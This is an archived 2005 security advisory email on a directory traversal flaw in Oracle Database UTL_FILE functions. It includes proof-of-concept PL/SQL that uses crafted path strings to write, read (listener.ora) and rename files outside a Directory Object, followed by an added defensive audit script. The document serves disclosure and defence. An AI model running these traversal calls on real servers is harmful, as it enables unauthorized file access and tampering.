From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 10 Mar 2005 15:52:25 +0200
Subject: [NEWS] Oracle Database Server Directory Transversal
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050310145820.E3FCC5739@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Oracle Database Server Directory Transversal
------------------------------------------------------------------------
SUMMARY
Oracle Database servers <http://www.oracle.com/database/index.html> are
vulnerable to directory traversal, which may allow an attacker to
overwrite, read or rename arbitrary files on the database server.
DETAILS
Vulnerable Systems:
* Oracle Database Server 8i
* Oracle Database Server 9i

Oracle Database Server provides many package functions for accessing the
OS file system. Some of these functions cannot access files directly: a
Directory Object must first be created and users granted permissions on
it. The object references a directory in the file system, and functions
can use it to access files under that directory only. However, the
functions do not properly validate their input, and by supplying a
specially constructed string the directory can be escaped and its parent
directories accessed. As a result, any file on the same drive as the
directory can be read, renamed, overwritten, etc.

By default, execute permission on the UTL_FILE package is granted to the
PUBLIC role, so any Oracle database user with permissions on a Directory
Object can exploit this vulnerability.
Proof Of Concept:
Creating/Writing a file:
declare
  f utl_file.file_type;
begin
  f := UTL_FILE.FOPEN
    ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
  UTL_FILE.PUT_LINE (f,'Sure',TRUE);
  UTL_FILE.FCLOSE(f);
end;
Reading a file:
SET SERVEROUTPUT ON
declare
  f utl_file.file_type;
  sBuffer Varchar(8000);
begin
  f := UTL_FILE.FOPEN
    ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
  loop
    UTL_FILE.GET_LINE (f,sBuffer);
    DBMS_OUTPUT.PUT_LINE(sBuffer);
  end loop;
EXCEPTION
  when no_data_found then
    UTL_FILE.FCLOSE(f);
end;
Rename a file:
begin
  UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;
Patch Availability:
Oracle has released a patch which can be found at:
http://metalink.oracle.com
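
As an added example (not part of the original advisory and not Oracle's patch), the SQL*Plus script below audits the two conditions described under DETAILS, EXECUTE on UTL_FILE and grants on Directory Objects, and defines a file-name check that application code could call before handing a name to UTL_FILE. It assumes a DBA-privileged session; the function name is_bare_filename and the sample inputs are hypothetical.

```sql
-- Added example: exposure audit plus a defensive file-name check.
-- Assumes a DBA-privileged SQL*Plus session.

-- 1. Grantees with EXECUTE on UTL_FILE (the advisory notes PUBLIC by default).
SELECT grantee
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_FILE'
   AND privilege = 'EXECUTE';

-- 2. Directory objects, their OS paths, and who may read or write through them.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
  FROM dba_directories d, dba_tab_privs p
 WHERE p.owner = d.owner
   AND p.table_name = d.directory_name
   AND p.privilege IN ('READ', 'WRITE')
 ORDER BY d.directory_name, p.grantee;

-- 3. Hypothetical helper (assumed name): accept only a bare file name, so the
--    value passed on to UTL_FILE cannot name a parent directory or a drive.
CREATE OR REPLACE FUNCTION is_bare_filename (p_name IN VARCHAR2)
  RETURN NUMBER
IS
BEGIN
  IF p_name IS NULL
     OR LENGTH(p_name) > 255
     OR INSTR(p_name, '\') > 0
     OR INSTR(p_name, '/') > 0
     OR INSTR(p_name, ':') > 0
     OR INSTR(p_name, '..') > 0
  THEN
    RETURN 0;  -- reject: path separator, drive specifier, or parent reference
  END IF;
  RETURN 1;    -- plain name with no path component
END is_bare_filename;
/

-- Constructed sample inputs: one plain name, one name with parent references.
SELECT is_bare_filename('report.txt')         AS plain_name,
       is_bare_filename('..\..\listener.ora') AS traversal_name
  FROM dual;
```

The check is an application-level safeguard only; rows returned by the first two queries show which accounts remain exposed until the vendor patch is applied.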
ADDITIONAL INFORMATION
The information has been provided by <mailto:cesarc56@yahoo.com.> Cesar
Cerrudo.
Oracle's advisory can be found at:
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf